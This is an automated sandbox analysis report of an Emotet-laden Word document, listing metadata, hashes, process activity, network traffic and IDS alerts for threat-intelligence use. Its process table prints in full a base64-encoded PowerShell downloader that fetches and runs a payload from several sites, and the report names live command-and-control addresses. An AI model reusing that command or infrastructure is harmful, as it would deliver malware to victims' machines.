download: | ogx7vtz2tr4j_8g5j473-096029329350379 |
Full analysis: | https://app.any.run/tasks/618daae0-3673-4956-9ad5-76f395ae7652 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 19:16:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Australian Dollar, Subject: Rubber, Author: Thalia Romaguera, Keywords: Bedfordshire, Comments: visionary, Template: Normal.dotm, Last Saved By: Nona Tremblay, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0 |
MD5: | 9513B1D4CC78349DAD3C20151118EAFF |
SHA1: | 7B63D465E84D2A4961E69C69464B807500C9AEEB |
SHA256: | FD8C3FCF8CA04DDD17F6FB7F7A6463912E6F33BFAF27E765188887FDE52686F0 |
SSDEEP: | 6144:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46di1:mRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdg |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Schroeder |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 205 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Marks - Kassulke |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 176 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:09 16:49:00 |
CreateDate: | 2019:10:09 16:49:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Nona Tremblay |
Template: | Normal.dotm |
Comments: | visionary |
Keywords: | Bedfordshire |
Author: | Thalia Romaguera |
Subject: | Rubber |
Title: | Australian Dollar |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2800 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ogx7vtz2tr4j_8g5j473-096029329350379.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3112 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADEANgA1AGIAOAAwADAANAAyADAAPQAnAGMAMgA1AGIANwAwADcANgA4AGMAOAAnADsAJAB4ADMAeABjADkAOQA1ADQAOAAwAHgAIAA9ACAAJwAyADQAOQAnADsAJAB4ADUANQAxADEANwAwADcANwA2ADUAYgA9ACcAYgA4AHgAMQBiADgAMABjADAANwAyADIAMAAnADsAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAAzAHgAYwA5ADkANQA0ADgAMAB4ACsAJwAuAGUAeABlACcAOwAkAHgAMAAxAGMAMgAwADQAMABiADYANQA9ACcAYwAwADgANQAyADAAYwAwAGIANABjACcAOwAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBFAGIAQwBMAGkARQBOAHQAOwAkAGIAMABjADAAOQA5ADIAMAA2ADQAeAAxADAAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAG8AcAByAGUAdAB0AHkAaABhAGkAcgBsAGwAYwAuAGMAbwBtAC8AdwBlAGwAYwBvAG0AZQAyAC8AaQByAGMAWQBkAGoAZQB3AFAAdAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AegBoAGkAegBhAGkAcwBpAGYAYQBuAGcALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAGYAZQBuAGMAZQAvAGQATABqAFAAVAB6AHkAbAAvAEAAaAB0AHQAcAA6AC8ALwBmAHUAdAB1AHIAZQAtAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEQARABiAFYAYwBMAFAAdgB6AC8AQABoAHQAdABwAHMAOgAvAC8AaQBtAHQAZwBsAG8AYgBhAGwAcwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwA1ADMAZQBmADAAdQA3AGYAbABfADQAeQAzAG0AeABtAGIAMABmAC0ANQA0AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdgBhAHMAdAB1AHYAaQBkAHkAYQBhAHIAYwBoAGkAdABlAGMAdABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBNAFgAUQB4AGcARgBaAEUALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwBAACcAKQA7ACQAYwA2ADAAMAAwADkAMwAzADYANwAxADAAPQAnAGMAOQAwADkANwA1ADcANgAwADAAMAAwADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAMAAwADAAMQAwADkANgA4ADQAOAAgAGkAbgAgACQAYgAwAGMAMAA5ADkAMgAwADYANAB4ADEAMAApAHsAdAByAHkAewAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgALgAiAGQAbwBXAE4ATABgAG8AYQBgAEQARgBJAGwARQAiACgAJABiADAAMAAwADEAMAA5ADYAOAA0ADgALAAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQA7ACQAYwA2AHgAMAAwAHgAMAB4AGMANwAwAD0AJwB4ADMANAA1AHgAeAAxADIAYwA5ADYAMAAwACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQAuACIATABFAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADIANgA0ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwApADsAJAB4ADAAOQB4AHgANgBiAGMAYgA1ADAAeAA4AD0AJwBjADgAOAAzADcANgAzADAAMABiAHgAJwA7AGIAcgBlAGEAawA7ACQAYgBiADAAOQAyAGIAeAA3AHgAMAAwADgAMgA9ACcAYgBjAGMANwAzADcAOQBiADEAMAAwADQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwAwAHgAOAAyADgAeAA2AGIAMAA3AD0AJwBjADAAMAA4ADMAMwAwADIAMAAwADQANgAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2488 | "C:\Program Files\Windows Media Player\wmplayer.exe" /prefetch:1 | C:\Program Files\Windows Media Player\wmplayer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) | ||||
3512 | "C:\Program Files\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files\Windows Media Player\wmplayer.exe" /prefetch:1 | C:\Program Files\Windows Media Player\setup_wm.exe | — | wmplayer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Windows Media Configuration Utility Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) | ||||
3388 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3796 | "C:\Program Files\WinRAR\WinRAR.exe" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3664 | "C:\Users\admin\249.exe" | C:\Users\admin\249.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2472 | --11c0a8b5 | C:\Users\admin\249.exe | 249.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2380 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 249.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
920 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4E8A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3112 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZGF4BADJWZ403UU38XTF.temp | — | |
MD5:— | SHA256:— | |||
2800 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:58362D3A772A98306A3BD83CCCF74366 | SHA256:464DECF6DD8B425AAEC8B237EE31236D61E78153935E52CD8026C87DC381FE82 | |||
1360 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal | — | |
MD5:— | SHA256:— | |||
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72766F55.wmf | wmf | |
MD5:AD3E990B1A08FEABF8B973BC06E21B7D | SHA256:97E06BE3DB9C67F970CE07CADC3A87CA7D4FA39D42C09DEC6FD6F3404427D36B | |||
1360 | AcroRd32.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.1360 | — | |
MD5:— | SHA256:— | |||
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$x7vtz2tr4j_8g5j473-096029329350379.doc | pgc | |
MD5:0CC4DB92EFE00875B91A7A646DBB2FEC | SHA256:2625B7F506BB4AC43670E6AF584F7325A305DE1CB8DCC0EFEEFF10FEB5F9097E | |||
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16528F71.wmf | wmf | |
MD5:39AD55F8B482E33398A3A39349235A33 | SHA256:7EA0E7820BB08BB0C3FED87B90E5762FADE38ECFA1B5051317E00C38B5812B13 | |||
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:89EAD3F2F95C3CD84E7FB7AE27F9B509 | SHA256:543B4910F26D36D170D4ABF0E8F90C61D809A667B7D35A636A9082A4E720A03F | |||
2800 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9614EBE.wmf | wmf | |
MD5:49C5D718F641C17D725BD20C4DE3C461 | SHA256:C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3380 | CCleaner.exe | GET | 301 | 151.101.0.64:80 | http://www.piriform.com/auto?a=0&p=cc&v=5.35.6210&l=1033&lk=&mk=IJR6-W5SV-5KYR-QBZD-6BY4-RN5Z-WAV9-RVK2-VJCA&o=6.1W3&au=1&mx=97B7721C4994E2556FF6A439510F665DB45337A341A47E15F4997584423BF714&gu=00000000-0000-4000-8000-d6f7f2be5127 | US | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/279_15_23_20070.zip | unknown | — | — | whitelisted |
936 | chrome.exe | GET | 204 | 172.217.26.35:80 | http://csi.gstatic.com/csi?v=3&s=gapi_module&action=gapi_iframes__googleapis_cli12&it=mli.27,mei.5&tbsrt=725&tran=15&e=abc_l0,abc_m0,abc_pgapi_iframes__googleapis_cli12,abc_u0&rt= | US | — | — | whitelisted |
936 | chrome.exe | GET | 302 | 172.217.18.174:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx | US | html | 509 b | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip | unknown | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip | unknown | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip | unknown | — | — | whitelisted |
1868 | AcroRd32.exe | GET | 304 | 2.16.186.97:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip | unknown | — | — | whitelisted |
920 | msptermsizes.exe | POST | 200 | 198.199.114.69:8080 | http://198.199.114.69:8080/taskbar/vermont/ringin/merge/ | US | binary | 132 b | malicious |
920 | msptermsizes.exe | POST | — | 23.239.29.211:443 | http://23.239.29.211:443/health/free/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1868 | AcroRd32.exe | 2.16.186.97:80 | acroipm2.adobe.com | Akamai International B.V. | — | whitelisted |
3380 | CCleaner.exe | 151.101.0.64:80 | www.piriform.com | Fastly | US | whitelisted |
3112 | powershell.exe | 47.110.40.3:443 | www.zhizaisifang.com | — | CN | unknown |
— | — | 151.101.0.64:443 | www.piriform.com | Fastly | US | whitelisted |
920 | msptermsizes.exe | 198.199.114.69:8080 | — | Digital Ocean, Inc. | US | malicious |
1868 | AcroRd32.exe | 2.21.36.203:443 | armmf.adobe.com | GTT Communications Inc. | FR | suspicious |
3380 | CCleaner.exe | 151.101.2.202:443 | www.ccleaner.com | Fastly | US | suspicious |
3380 | CCleaner.exe | 151.101.0.64:443 | www.piriform.com | Fastly | US | whitelisted |
3112 | powershell.exe | 45.56.100.50:443 | www.soprettyhairllc.com | Linode, LLC | US | unknown |
3112 | powershell.exe | 45.56.100.50:80 | www.soprettyhairllc.com | Linode, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.soprettyhairllc.com |
| unknown |
www.zhizaisifang.com |
| unknown |
acroipm2.adobe.com |
| whitelisted |
armmf.adobe.com |
| whitelisted |
www.piriform.com |
| whitelisted |
www.ccleaner.com |
| whitelisted |
ardownload2.adobe.com |
| whitelisted |
clientservices.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
www.google.com.ua |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
920 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
920 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
920 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
920 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
Process | Message |
---|---|
vlc.exe | core libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.
|